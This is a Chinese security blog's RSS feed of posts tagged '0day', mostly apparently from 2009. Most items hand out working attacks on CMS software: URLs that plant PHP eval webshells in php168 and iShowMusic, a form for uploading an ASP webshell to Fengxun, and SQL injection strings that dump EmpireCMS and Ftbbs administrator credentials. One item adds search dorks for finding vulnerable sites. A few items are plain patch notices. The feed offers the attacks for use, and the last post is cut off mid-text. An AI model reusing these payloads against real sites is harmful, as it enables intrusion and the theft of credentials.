<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>P9's BLOG &#187; 0day</title>
	<atom:link href="http://www.p9.net.cn/tag/0day/feed" rel="self" type="application/rss+xml" />
	<link>http://www.p9.net.cn</link>
	<description>同一天地间,同一网络下,P9'Blog与您共享今日互联网→WWW.P9.NET.CN</description>
	<lastBuildDate>Thu, 28 Apr 2011 23:57:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>php1686.0被爆0day可瞬间获得webshell</title>
		<link>http://www.p9.net.cn/sec/php168600day.html</link>
		<comments>http://www.p9.net.cn/sec/php168600day.html#comments</comments>
		<pubDate>Wed, 09 Sep 2009 00:17:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2911</guid>
		<description><![CDATA[php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&#38;chdb[htmlname]=ccc.php&#38;chdb[path]=cache&#38;content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&amp;chdb[htmlname]=ccc.php&amp;chdb[path]=cache&amp;content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2911&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2911" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/php168600day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>风讯4.0 sp7 0day漏洞</title>
		<link>http://www.p9.net.cn/sec/fengxun40sp7-0day.html</link>
		<comments>http://www.p9.net.cn/sec/fengxun40sp7-0day.html#comments</comments>
		<pubDate>Tue, 14 Jul 2009 23:14:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2455</guid>
		<description><![CDATA[转自:零客 发现者：bloodsword bink
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.xxx.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&#38;Type=AddFolder&#38;Path=/userfiles/
06150583700/aaa.asp//&#38;CurrPath=/userfiles/06150583700
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：
&#60;form name=&#8221;FileForm&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221; action=&#8221;http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp&#8221;&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;AutoReName&#8221; value=&#8221;2&#8243;&#62;&#60;br&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;Path&#8221; value=&#8221;/userfiles/06150583700/aaa.asp&#8221;&#62;
    &#60;input type=&#8221;file&#8221; size=&#8221;20&#8243; name=&#8221;File1&#8243;&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;FilesNum&#8221; value=&#8221;1&#8243;&#62;
    &#60;input type=&#8221;submit&#8221; id=&#8221;BtnSubmit&#8221; name=&#8221;Submit&#8221; value=&#8221; 确 定 &#8220;&#62;
    &#60;input type=&#8221;reset&#8221; id=&#8221;ResetForm&#8221; name=&#8221;Submit3&#8243; value=&#8221; 重 填 &#8220;&#62;
&#60;/form&#62;
传个夹带一句话的图片上去
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>转自:零客 发现者：bloodsword bink<br />
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录<br />
首先注册个账号访问http://www.<span style="color: #000000;">xxx</span>.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&amp;Type=AddFolder&amp;Path=/userfiles/</p>
<p>06150583700/aaa.asp//&amp;CurrPath=/userfiles/06150583700<span id="more-2455"></span><br />
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录<br />
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：<br />
&lt;form name=&#8221;FileForm&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221; action=&#8221;http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp&#8221;&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;AutoReName&#8221; value=&#8221;2&#8243;&gt;&lt;br&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;Path&#8221; value=&#8221;/userfiles/06150583700/aaa.asp&#8221;&gt;<br />
    &lt;input type=&#8221;file&#8221; size=&#8221;20&#8243; name=&#8221;File1&#8243;&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;FilesNum&#8221; value=&#8221;1&#8243;&gt;<br />
    &lt;input type=&#8221;submit&#8221; id=&#8221;BtnSubmit&#8221; name=&#8221;Submit&#8221; value=&#8221; 确 定 &#8220;&gt;<br />
    &lt;input type=&#8221;reset&#8221; id=&#8221;ResetForm&#8221; name=&#8221;Submit3&#8243; value=&#8221; 重 填 &#8220;&gt;<br />
&lt;/form&gt;<br />
传个夹带一句话的图片上去<br />
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有<br />
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2455&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2455" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/fengxun40sp7-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>帝国cms 0day e/tool/gbook/?bid=1</title>
		<link>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html</link>
		<comments>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html#comments</comments>
		<pubDate>Sun, 14 Jun 2009 00:46:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1935</guid>
		<description><![CDATA[帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0&#215;5f,password,0&#215;5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1936" class="wp-caption alignright" style="width: 208px"><a href="http://www.p9.net.cn/tag/0day"><img class="size-full wp-image-1936" title="帝国cms 0day" src="http://www.p9.net.cn/wp-content/uploads/2009/06/ecms0day.jpg" alt="帝国cms 0day" width="198" height="49" /></a><p class="wp-caption-text">帝国cms 0day</p></div>
<p>帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1<br />
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代<br />
然后在联系邮箱处填,1,1,1,(select concat(username,0&#215;5f,password,0&#215;5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*<br />
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到<a href="http://www.cmd5.com/">http://www.cmd5.com/</a>或<a href="http://www.xmd5.com/">http://www.xmd5.com/</a>查询.帝国cms管理后台地址是e/admin/</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1935&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1935" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>windows7 0day</title>
		<link>http://www.p9.net.cn/windows7/windows7-0day.html</link>
		<comments>http://www.p9.net.cn/windows7/windows7-0day.html#comments</comments>
		<pubDate>Fri, 15 May 2009 01:03:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1495</guid>
		<description><![CDATA[windows7 首个0day被360安全中心发现,该0day属于内核级漏洞,所有windows7 rc版及以下版本都有.漏洞产生原因是gdi程序可以任意权限操作导致系统蓝屏,目前还没有补丁.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1031" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/windows7"><img class="size-full wp-image-1031" title="windows7" src="http://www.p9.net.cn/wp-content/uploads/2009/03/windows7.gif" alt="windows7 0day" width="90" height="87" /></a><p class="wp-caption-text">windows7 0day</p></div>
<p>windows7 首个0day被360安全中心发现,该0day属于内核级漏洞,所有windows7 rc版及以下版本都有.漏洞产生原因是gdi程序可以任意权限操作导致系统蓝屏,目前还没有补丁.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1495&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1495" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/windows7/windows7-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>powerpoint 0day 补丁</title>
		<link>http://www.p9.net.cn/softdriver/powerpoint-0day-%e8%a1%a5%e4%b8%81.html</link>
		<comments>http://www.p9.net.cn/softdriver/powerpoint-0day-%e8%a1%a5%e4%b8%81.html#comments</comments>
		<pubDate>Fri, 08 May 2009 22:02:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Software and driver]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[系统补丁]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1445</guid>
		<description><![CDATA[office powerpoint 今日被爆出0day漏洞 涉及版本从2000一直到2007几乎所有版本都有这个漏洞,目前还无人发布利用工具,微软将会在5月12日发布紧急补丁,微软关于本漏洞的介绍网页http://www.microsoft.com/technet/security/advisory/969136.mspx
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/系统补丁"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="powepoint 0day 补丁" width="90" height="100" /></a><p class="wp-caption-text">powepoint 0day 补丁</p></div>
<p>office powerpoint 今日被爆出0day漏洞 涉及版本从2000一直到2007几乎所有版本都有这个漏洞,目前还无人发布利用工具,微软将会在5月12日发布紧急补丁,微软关于本漏洞的介绍网页<a href="http://www.microsoft.com/technet/security/advisory/969136.mspx">http://www.microsoft.com/technet/security/advisory/969136.mspx</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1445&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1445" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/softdriver/powerpoint-0day-%e8%a1%a5%e4%b8%81.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>暴风影音0day补丁</title>
		<link>http://www.p9.net.cn/internet/baofeng-0day-patch.html</link>
		<comments>http://www.p9.net.cn/internet/baofeng-0day-patch.html#comments</comments>
		<pubDate>Tue, 05 May 2009 08:24:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Internet event and application]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[系统补丁]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1418</guid>
		<description><![CDATA[暴风影音这几天出了0day漏洞,还好官方及时出了补丁,请安装暴风影音的朋友及时升级,或下载补丁安装,补丁下载地址http://bbs.baofeng.com/job.php?action=download&#38;pid=986719&#38;tid=121239&#38;aid=15807
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>暴风影音这几天出了0day漏洞,还好官方及时出了补丁,请安装暴风影音的朋友及时升级,或下载补丁安装,补丁下载地址<a href="http://bbs.baofeng.com/job.php?action=download&amp;pid=986719&amp;tid=121239&amp;aid=15807" target="_blank">http://bbs.baofeng.com/job.php?action=download&amp;pid=986719&amp;tid=121239&amp;aid=15807</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1418&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1418" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/internet/baofeng-0day-patch.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ftbbs7.1静态GBK版注入0day(coolkid提供)</title>
		<link>http://www.p9.net.cn/sec/ftbbs71-0day.html</link>
		<comments>http://www.p9.net.cn/sec/ftbbs71-0day.html#comments</comments>
		<pubDate>Tue, 07 Apr 2009 01:58:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1160</guid>
		<description><![CDATA[Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
请使用ftbbs的用户关注它的官网安全补丁发布.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/0day"><img class="size-full wp-image-690" title="ftbbs7.1注入漏洞" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="ftbbs7.1注入漏洞" width="90" height="100" /></a><p class="wp-caption-text">ftbbs7.1注入漏洞</p></div>
<p>Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式<a href="http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin">http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin</a></p>
<p>请使用ftbbs的用户关注它的官网安全补丁发布.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1160&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1160" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ftbbs71-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VSB网站综合管理平台0day</title>
		<link>http://www.p9.net.cn/sec/vsb-0day.html</link>
		<comments>http://www.p9.net.cn/sec/vsb-0day.html#comments</comments>
		<pubDate>Fri, 27 Mar 2009 05:26:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=987</guid>
		<description><![CDATA[VSB 0day给一个简单的POC：在system/firm/firmreg.jsp文件会产生越权操作行为，导致其注册帐号并上传JSP木马！作者:冰的原点[L.S.T]
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>VSB 0day给一个简单的POC：在system/firm/firmreg.jsp文件会产生越权操作行为，导致其注册帐号并上传JSP木马！作者:冰的原点[L.S.T]</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=987&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_987" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/vsb-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Qcms1.0漏洞</title>
		<link>http://www.p9.net.cn/sec/qcms-vulnerability.html</link>
		<comments>http://www.p9.net.cn/sec/qcms-vulnerability.html#comments</comments>
		<pubDate>Thu, 26 Mar 2009 10:26:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=973</guid>
		<description><![CDATA[qcms 0day漏洞如下：
1.可以下载数据库。
2.注入：
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下：
admin_name=trim(request.Form(&#8220;admin_name&#8221;))
admin_password=trim(request.Form(&#8220;admin_password&#8221;))
admin_password=md5(admin_password)
if admin_name=&#8221;" then
session(&#8220;admin_name&#8221;)=&#8221;"
%&#62;
&#60;SCRIPT LANGUAGE=vbscript&#62;
&#60;!&#8211;
msgbox(&#8220;请输入用户名!&#8221;)
window.self.location.href=&#8221;admin_login.asp&#8221;
&#8211;&#62;
&#60;/SCRIPT&#62;
&#60;%
else
if admin_password=&#8221;" then
session(&#8220;admin_name&#8221;)=&#8221;"
%&#62;
&#60;SCRIPT LANGUAGE=vbscript&#62;
&#60;!&#8211;
msgbox(&#8220;请输入密码!&#8221;)
window.self.location.href=&#8221;admin_login.asp&#8221;
&#8211;&#62;
&#60;/SCRIPT&#62;
&#60;%
else
sql=&#8221;select * from admin where admin_name=&#8217;&#8221;&#38;admin_name&#38;&#8221;&#8216; and admin_password=&#8217;&#8221;&#38;admin_password&#38;&#8221;&#8216;&#8221;
很明显，传说的万能密码，重现江湖。
上传漏洞。
没做任何判断，也没有。
也没用权限判断。
代码就不给了，大家自己找。
后台一处
插件：fckeditor
也有上传漏洞，网上有，大家自己看
暴库：
代码如下：
&#60;%
set conn=server.createobject(&#8220;adodb.connection&#8221;)
conn.open &#8220;driver={microsoft access driver (*.mdb)};dbq=&#8221;&#38;server.mappath(&#8220;/db.mdb&#8221;)
%&#62;
没任何处理
这个版本和我向作者提交漏洞的版本不一样！
这个版本没用防注入。
就这几个，简单，但很致命。
后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="qcms 0day" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="qcms 0day" width="90" height="100" /></a><p class="wp-caption-text">qcms 0day</p></div>
<p>qcms 0day漏洞如下：<br />
1.可以下载数据库。<br />
2.注入：<br />
后台的登陆文件<br />
见Login.asp(登陆的判断处理)<br />
代码如下：<br />
admin_name=trim(request.Form(&#8220;admin_name&#8221;))<br />
<span id="more-973"></span>admin_password=trim(request.Form(&#8220;admin_password&#8221;))<br />
admin_password=md5(admin_password)<br />
if admin_name=&#8221;" then<br />
session(&#8220;admin_name&#8221;)=&#8221;"<br />
%&gt;<br />
&lt;SCRIPT LANGUAGE=vbscript&gt;<br />
&lt;!&#8211;<br />
msgbox(&#8220;请输入用户名!&#8221;)<br />
window.self.location.href=&#8221;admin_login.asp&#8221;<br />
&#8211;&gt;<br />
&lt;/SCRIPT&gt;<br />
&lt;%<br />
else<br />
if admin_password=&#8221;" then<br />
session(&#8220;admin_name&#8221;)=&#8221;"<br />
%&gt;<br />
&lt;SCRIPT LANGUAGE=vbscript&gt;<br />
&lt;!&#8211;<br />
msgbox(&#8220;请输入密码!&#8221;)<br />
window.self.location.href=&#8221;admin_login.asp&#8221;<br />
&#8211;&gt;<br />
&lt;/SCRIPT&gt;<br />
&lt;%<br />
else<br />
sql=&#8221;select * from admin where admin_name=&#8217;&#8221;&amp;admin_name&amp;&#8221;&#8216; and admin_password=&#8217;&#8221;&amp;admin_password&amp;&#8221;&#8216;&#8221;<br />
很明显，传说的万能密码，重现江湖。</p>
<p>上传漏洞。<br />
没做任何判断，也没有。<br />
也没用权限判断。<br />
代码就不给了，大家自己找。<br />
后台一处<br />
插件：fckeditor<br />
也有上传漏洞，网上有，大家自己看<br />
暴库：<br />
代码如下：<br />
&lt;%<br />
set conn=server.createobject(&#8220;adodb.connection&#8221;)<br />
conn.open &#8220;driver={microsoft access driver (*.mdb)};dbq=&#8221;&amp;server.mappath(&#8220;/db.mdb&#8221;)<br />
%&gt;<br />
没任何处理</p>
<p>这个版本和我向作者提交漏洞的版本不一样！<br />
这个版本没用防注入。</p>
<p>就这几个，简单，但很致命。</p>
<p>后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=973&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_973" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/qcms-vulnerability.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iShowMusic V1.2 直接写shell漏洞</title>
		<link>http://www.p9.net.cn/sec/ishowmusic-0day.html</link>
		<comments>http://www.p9.net.cn/sec/ishowmusic-0day.html#comments</comments>
		<pubDate>Sun, 22 Mar 2009 07:08:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=939</guid>
		<description><![CDATA[iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==&#8221;save&#8221;){
$cknumon &#38;&#38; GdConfirm($gdcode);
if(empty($id)) {
    Showmsg(&#8220;no&#8221;,&#8221;你还未选择歌曲呢!&#8221;,&#8221;返回重新填写&#8221;,&#8221;javascript:history.back(-1)&#8221;); exit;}
elseif(empty($_POST['user'])) {
    Showmsg(&#8220;no&#8221;,&#8221;你还没写名字呢!&#8221;,&#8221;返回重新填写&#8221;,&#8221;javascript:history.back(-1)&#8221;); exit;}
else{
   $user=safeconvert($user);
   $line=&#8221;$user&#124;$songname&#124;$id&#124;$errmsg&#124;$timestamp&#124;\n&#8221;;
   $e=&#8221;$datadir/error.php&#8221;;
   writetofile($e,$line,&#8221;a+&#8221;);
   Showmsg(&#8220;yes&#8221;,&#8221;提交成功，谢谢您的支持！&#8221;,&#8221;关闭本页&#8221;,&#8221;javascript:window.close()&#8221;); exit;
}在global.php 27-34行复制内容到剪贴板代码:
foreach($_POST as $_key=&#62;$_value){
        $_POST[$_key]=str_replace(array(&#8216;&#124;&#8217;,'$&#8217;,&#8217;..&#8217;),array
(&#8216;&#124;&#8217;,'$&#8217;,&#8217;..&#8217;),$_POST[$_key]);
        !ereg(&#8220;^\_&#8221;,$_key) &#38;&#38; !$$_key &#38;&#38; [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="安全" width="90" height="100" /></a><p class="wp-caption-text">安全</p></div>
<p>iShowMusic在error.php 12-26行复制内容到剪贴板代码:<br />
elseif ($_POST['action']==&#8221;save&#8221;){<br />
$cknumon &amp;&amp; GdConfirm($gdcode);<br />
if(empty($id)) {<br />
    Showmsg(&#8220;no&#8221;,&#8221;你还未选择歌曲呢!&#8221;,&#8221;返回重新填<span id="more-939"></span>写&#8221;,&#8221;javascript:history.back(-1)&#8221;); exit;}<br />
elseif(empty($_POST['user'])) {<br />
    Showmsg(&#8220;no&#8221;,&#8221;你还没写名字呢!&#8221;,&#8221;返回重新填写&#8221;,&#8221;javascript:history.back(-1)&#8221;); exit;}<br />
else{<br />
   $user=safeconvert($user);<br />
   $line=&#8221;$user|$songname|$id|$errmsg|$timestamp|\n&#8221;;<br />
   $e=&#8221;$datadir/error.php&#8221;;<br />
   writetofile($e,$line,&#8221;a+&#8221;);<br />
   Showmsg(&#8220;yes&#8221;,&#8221;提交成功，谢谢您的支持！&#8221;,&#8221;关闭本页&#8221;,&#8221;javascript:window.close()&#8221;); exit;<br />
}在global.php 27-34行复制内容到剪贴板代码:<br />
foreach($_POST as $_key=&gt;$_value){<br />
        $_POST[$_key]=str_replace(array(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),array</p>
<p>(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),$_POST[$_key]);<br />
        !ereg(&#8220;^\_&#8221;,$_key) &amp;&amp; !$$_key &amp;&amp; $$_key=$_POST[$_key];<br />
}<br />
foreach($_GET as $_key=&gt;$_value){<br />
        $_GET[$_key]=str_replace(array(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),array</p>
<p>(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),$_GET[$_key]);<br />
        !ereg(&#8220;^\_&#8221;,$_key) &amp;&amp; !$$_key &amp;&amp; $$_key=$_GET[$_key];<br />
}这段代码是允许在register_globals在off的情况下工作<br />
程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.<br />
导致失去了这段代码本来的作用.</p>
<p>function writetofile($file_name, $data, $method = &#8220;w&#8221;)<br />
{<br />
        $filenum = fopen($file_name, $method);<br />
        flock($filenum, LOCK_EX);<br />
        $file_data = fwrite($filenum, $data);<br />
        fclose($filenum);<br />
        return $file_data;<br />
}</p>
<p>这个函数也没有任何过滤就把$data写进去了,呵呵</p>
<p>hxxp://www.xxx.com/error.php?errid=1&amp;errtitle=&lt;?eval($_POST[wst]);?&gt;</p>
<p>然后提交一下你就能获得一个shell在</p>
<p>hxxp://www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文</p>
<p>件夹改名,呵呵)</p>
<p>刚经群里的朋友提示,发现这段代码并没有错误复制内容到剪贴板代码:<br />
foreach($_POST as $_key=&gt;$_value){<br />
        $_POST[$_key]=str_replace(array(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),array</p>
<p>(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),$_POST[$_key]);<br />
        !ereg(&#8220;^\_&#8221;,$_key) &amp;&amp; !$$_key &amp;&amp; $$_key=$_POST[$_key];<br />
}<br />
foreach($_GET as $_key=&gt;$_value){<br />
        $_GET[$_key]=str_replace(array(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),array</p>
<p>(&#8216;|&#8217;,'$&#8217;,&#8217;..&#8217;),$_GET[$_key]);<br />
        !ereg(&#8220;^\_&#8221;,$_key) &amp;&amp; !$$_key &amp;&amp; $$_key=$_GET[$_key];<br />
}呵呵..虽然我在本地本地测试的时候确实没替换.<br />
现在修改哈Ryat提供的邪恶的shellcode..嘿嘿<br />
